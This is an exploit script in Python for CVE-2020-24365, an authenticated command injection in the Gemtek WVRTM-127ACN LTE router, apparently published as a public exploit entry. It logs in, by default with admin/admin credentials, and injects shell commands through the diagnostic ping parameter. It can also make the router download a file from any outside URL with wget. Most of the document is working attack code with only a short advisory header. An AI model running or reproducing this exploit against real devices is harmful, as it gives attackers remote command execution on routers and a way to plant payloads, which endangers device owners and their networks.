# Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection # Date: 13/09/2020 # Exploit Author: Gabriele Zuddas # Version: 01.01.02.127, 01.01.02.141 # CVE : CVE-2020-24365 Service Provider : Linkem Product Name : LTE CPE Model ID : WVRTM-127ACN Serial ID : GMK170418011089 IMEI : XXXXXXXXXXXXX ICCID : XXXXXXXXXXXXXXXXXX Firmware Version : 01.01.02.141 Firmware Creation Date : May 15 13:04:30 CST 2019 Bootrom Version : U-Boot 1.1.3 Bootrom Creation Date : Oct 23 2015 - 16:03:05 LTE Support Band : 42,43 Injecting happens here: sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)& Exploit has been tested on older verions too: Firmware Version: 01.01.02.127 Firmware Creation Date : May 23 15:34:10 CST 2018 """ import requests, time, argparse, re, sys class Exploit(): CVE = "CVE-2020-24365" def __init__(self, args): self.args = args self.session = requests.Session() def login(self): s = self.session r = s.post(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=login.asp&action=login", data={"user_name":self.args.username,"user_passwd":self.args.password}) if "sid" not in s.cookies: print("[!] Login failed.") exit(1) sid = s.cookies["sid"] s.headers = {"sid": sid} print(f"[*] Login successful! (sid={sid})") def now(self): return int(time.time() * 1000) def exploit(self, command): self.login() with self.session as s: payload = f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$({command};)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4&time={self.now()}&_={self.now()}" r = s.get(payload) r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}") content = str(r.content, "utf8") #Attempt to stop the command as some commands tend to get stuck (if commands stop working check on the web interface) r = s.get(payload) r = s.get(f"http://{self.args.target}/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1&time={self.now()}&_={self.now()}") content = str(r.content, "utf8") #TODO: eventually parse content with regex to clean out the output c = re.findall(r"(?<=ping: bad address \')(.*)(?=\')", content) print(content) print(c[0]) if len(c) > 0: return c[0] else: return False def download_file(self, url): filename = url.rsplit('/', 1)[-1] if self.args.file is not None: print(f"[*] Attempting download of file '{filename}' from {url} ...") if self.exploit(f"wget {url} -O /tmp/{filename}"): print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.") print(self.exploit(f"du -h /tmp/{filename}")) return True else: print(f"[!] Failed to download {filename} from {url}") return False def run(self): if self.args.command is not None: print(self.exploit(self.args.command)) exit() if self.args.file is not None: self.download_file(self.args.file) exit() if __name__ == "__main__": # Create the parser and add arguments parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target") parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use") parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use") parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute") parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory") args = parser.parse_args() # Run exploit X = Exploit(args) if len(sys.argv) > 1: print(f"[*] Exploiting {X.CVE} ...") X.run() else: parser.print_help(sys.stderr)